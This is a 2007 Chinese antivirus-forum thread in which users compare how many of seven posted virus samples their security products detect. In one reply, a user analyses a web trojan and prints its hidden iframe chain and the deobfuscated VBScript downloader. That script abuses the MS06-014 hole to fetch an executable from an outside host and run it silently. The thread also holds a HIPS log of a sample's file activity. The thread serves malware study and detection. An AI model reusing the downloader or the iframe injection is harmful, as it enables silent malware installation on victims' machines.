楼主: 绅博周幸
收起左侧

[病毒样本] 7个样本,看看你的杀软杀几个,是最近流行病毒

[复制链接]
dikex
发表于 2007-1-19 16:02:32 | 显示全部楼层
原帖由 iGod 于 2007-1-19 14:32 发表
江民KV2006报了六个,那个英豪学校的网页木马没报



那个英豪的其实并没有直接的有害代码,只是在它的代码最后面镶嵌了一个网页
  1. <iframe src="http://www.ac66.cn/88/index.htm" width="0" height="0" frameborder="0"></iframe>
复制代码



而这个http://www.ac66.cn/88/index.htm里面又镶嵌了一个网页
  1. <iframe src="http://www.ac66.cn/88/joke.htm" width="0" height="0" frameborder="0"></iframe>
复制代码



这个http://www.ac66.cn/88/joke.htm才是真正的存在有害代码的网页,卡巴报为Trojan-Downloader.VBS.Agent.b,经过ASCII码转换后核心的代码是下面的这个:
  1.     on error resume next
  2.     dl = "http://www.ac66.cn/88/buding.exe"
  3.     Set df = document.createElement("object")
  4.     df.setAttribute "classid", "clsid:BD96C556-65A3-11D0-983A-00C04FC29E36"
  5.     str="Microsoft.XMLHTTP"
  6.     Set x = df.CreateObject(str,"")
  7.     a1="Ado"
  8.     a2="db."
  9.     a3="Str"
  10.     a4="eam"
  11.     str1=a1&a2&a3&a4
  12.     str5=str1
  13.     set S = df.createobject(str5,"")
  14.     S.type = 1
  15.     str6="GET"
  16.     x.Open str6, dl, False
  17.     x.Send
  18.     fname1="g0ld.com"
  19.     set F = df.createobject("Scripting.FileSystemObject","")
  20.     set tmp = F.GetSpecialFolder(2)
  21.     fname1= F.BuildPath(tmp,fname1)
  22.     S.open
  23.     S.write x.responseBody
  24.     S.savetofile fname1,2
  25.     S.close
  26.     set Q = df.createobject("Shell.Application","")
  27.     Q.ShellExecute fname1,"","","open",0
复制代码



看到了clsid:BD96C556-65A3-11D0-983A-00C04FC29E36这个,不用继续对上面的代码作出处理就知道她是利用MS06014漏洞的网马了,而它想要进行非法下载的就是http://www.ac66.cn/88/buding.exe这个文件,卡巴报为Trojan-Downloader.Win32.Delf.asb

[ 本帖最后由 dikex 于 2007-1-19 16:26 编辑 ]

评分

参与人数 1经验 +3 收起 理由
绅博周幸 + 3 感谢解答: )

查看全部评分

hzp
发表于 2007-1-19 16:42:48 | 显示全部楼层
毒霸也是六个,看来毒霸还是不是想象中的那么垃圾!
绅博周幸
 楼主| 发表于 2007-1-19 17:11:28 | 显示全部楼层
Win32:Tibs-ADO------AVAST直接不让下载
yuezheng710
发表于 2007-1-19 20:52:11 | 显示全部楼层
nod32查了6个,其中soundmix没查出来
wao1201
发表于 2007-1-19 21:23:51 | 显示全部楼层
OK  F-Secure全部搞定
寂寞の夜
发表于 2007-1-19 22:52:42 | 显示全部楼层
咖啡查到四个。
不过剩下的三个都运行了一下,结果是这样的
2007-1-19        22:56:59        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\soundmix\soundmix.exe        C:\WINDOWS\system32\PSAPI.DLL        用户定义的规则:A86 超级防护规则(警告!慎用此规则!)
        
2007-1-19        22:57:06        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\IMM32.DLL        用户定义的规则:A86 超级防护规则(警告!慎用此规则!)         

2007-1-19        22:57:06        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\LPK.DLL        用户定义的规则:A86 超级防护规则(警告!慎用此规则!)         

2007-1-19        22:57:06        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\F969CAFC.EXE        通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件     
   
2007-1-19        22:57:07        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\F969CAFCT.EXE        通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件         
2007-1-19        22:57:07        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\delme.bat        防病毒爆发控制:将所有共享项设为只读         
2007-1-19        22:57:08        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\IMM32.DLL        用户定义的规则:A86 超级防护规则(警告!慎用此规则!)         
2007-1-19        22:57:08        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\LPK.DLL        用户定义的规则:A86 超级防护规则(警告!慎用此规则!)         
2007-1-19        22:57:08        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\F969CAFC.EXE        通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件         
2007-1-19        22:57:08        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\F969CAFCT.EXE        通用最大保护:禁止在 Windows 文件夹中创建新的可执行文件         
2007-1-19        22:57:08        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\virus\66E95508.eXE        C:\WINDOWS\system32\delme.bat        防病毒爆发控制:将所有共享项设为只读         
2007-1-19        22:57:12        1092        CHINESE-6623347\kxz        D:\virus\2007115223956261\收集的一点病毒样本,有威金,熊猫,有兴趣的可以研究下!!!\威金变种\GameSetup.exe        C:\WINDOWS\system32\WSOCK32.DLL        用户定义的规则:A86 超级防护规则(警告!慎用此规则!)

[ 本帖最后由 寂寞の夜 于 2007-1-19 22:56 编辑 ]
bleach
头像被屏蔽
发表于 2007-1-21 09:27:56 | 显示全部楼层
DRWEB7个全杀
pchhh
发表于 2007-1-22 01:44:40 | 显示全部楼层
大蜘蛛全杀!
Kakura
发表于 2007-1-22 12:31:12 | 显示全部楼层
下都下不下来~~~
lcg391
发表于 2007-1-22 17:29:42 | 显示全部楼层
蜘蛛通杀啊!
支持蜘蛛啊!
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-3-29 21:41 , Processed in 0.107841 second(s), 16 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表